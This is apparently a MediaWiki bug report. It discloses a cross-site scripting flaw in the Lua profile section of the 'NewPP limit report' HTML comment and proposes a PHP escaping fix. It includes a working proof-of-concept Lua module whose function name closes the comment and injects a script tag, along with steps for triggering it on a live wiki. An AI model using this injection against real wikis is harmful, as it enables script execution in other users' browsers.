If over one second of CPU time is used in Lua, the Lua functions using the most CPU time are listed in the "NewPP limit report" HTML comment, and Lua function names are not escaped there. Since a Lua function can be named almost anything, a name containing "-->" closes the comment early and the rest of the name lands in the page as markup. So {{#invoke:Evil|hello}} with the following as Module:Evil will be bad:
    local p = {}
    function p.hello()
        -- call the function whose name closes the HTML comment, then burn CPU
        -- so the profile is reported at all
        p['--><script>alert("uh oh")</script>']()
        for i = 0, 1e8 do end
    end
    p['--><script>alert("uh oh")</script>'] = function ()
        -- busy loop so this name tops the Lua profile
        for i = 0, 1e9 do end
    end
    return p
(adjust the 1e8 and 1e9 to suit the speed of whatever wiki you're testing it on). You can test this live, right now, by going to https://en.wikipedia.org/w/index.php?title=Module:Bananas&action=edit, pasting the above in, and entering "Template:Lua hello world" in the TemplateSandbox field.
It should be simple enough to fix; probably the best thing would be to escape $limitReport at includes/parser/Parser.php line 504. The question is what exactly needs to be escaped to make the "NewPP limit report" comment safe while keeping it readable. Would something as simple as
    str_replace( "--", "‐‐", $engine->getLimitReport() )
(that's U+2010) work?
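As an added illustration of that suggestion (not MediaWiki's own code; the function names and the sample report are constructed), here is the double-hyphen replacement written out as a reusable escaper, together with a check that the escaped text can no longer close the comment. It also covers the two other ways the HTML tokenizer ends a comment, "--!>" and a comment whose data begins with ">" or "->", which the bare str_replace handles only by accident of where the report is placed.

```php
<?php
// Added example, not MediaWiki's code: escape a Scribunto limit report so it
// cannot terminate the "<!-- NewPP limit report ... -->" comment the parser
// wraps it in. Function names and sample data below are constructed.

function escapeForHtmlComment( string $text ): string {
    // The HTML tokenizer closes a comment on "-->" and also on "--!>", so the
    // dangerous token is the double hyphen itself. Replace every "--" with two
    // U+2010 HYPHEN characters: they look like hyphens in a browser's source
    // view but are not ASCII "-" to the tokenizer. Because str_replace scans
    // left to right without overlap, a run of n hyphens leaves at most one
    // ASCII "-" behind, so no "--" can survive the replacement.
    $text = str_replace( '--', "\u{2010}\u{2010}", $text );

    // A comment whose data starts with ">" or "->" is closed immediately
    // ("abrupt closing"). Parser.php puts a newline before the report, but a
    // reusable escaper should not rely on that, so pad such a start.
    if ( preg_match( '/^-?>/', $text ) ) {
        $text = ' ' . $text;
    }
    return $text;
}

// True when $text, placed inside an HTML comment, could close it.
function canCloseHtmlComment( string $text ): bool {
    return strpos( $text, '-->' ) !== false
        || strpos( $text, '--!>' ) !== false
        || preg_match( '/^-?>/', $text ) === 1;
}

// Constructed sample: a limit report in which a Lua function carried the
// comment-breaking name from the report above.
$report = "Lua time usage: 1.2s\n"
    . "Lua Profile:\n"
    . "    --><script>alert(\"uh oh\")</script>  1000 ms  83.3%\n"
    . "    hello                                 200 ms  16.7%\n";

$safe = escapeForHtmlComment( $report );

// The raw report breaks out of the comment; the escaped one does not.
assert( canCloseHtmlComment( $report ) === true );
assert( canCloseHtmlComment( $safe ) === false );

// The report is still readable in the page source; only the hyphens changed.
echo "<!--\nNewPP limit report\n" . $safe . "-->\n";
```

Two caveats worth keeping in mind with this approach: the report is no longer byte-identical (anything that greps the comment for Lua function names will see U+2010 rather than "-"), and htmlspecialchars() is not a substitute here, because inside a comment ">" is harmless on its own and only the "--" sequence matters.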
Version: unspecified
Severity: critical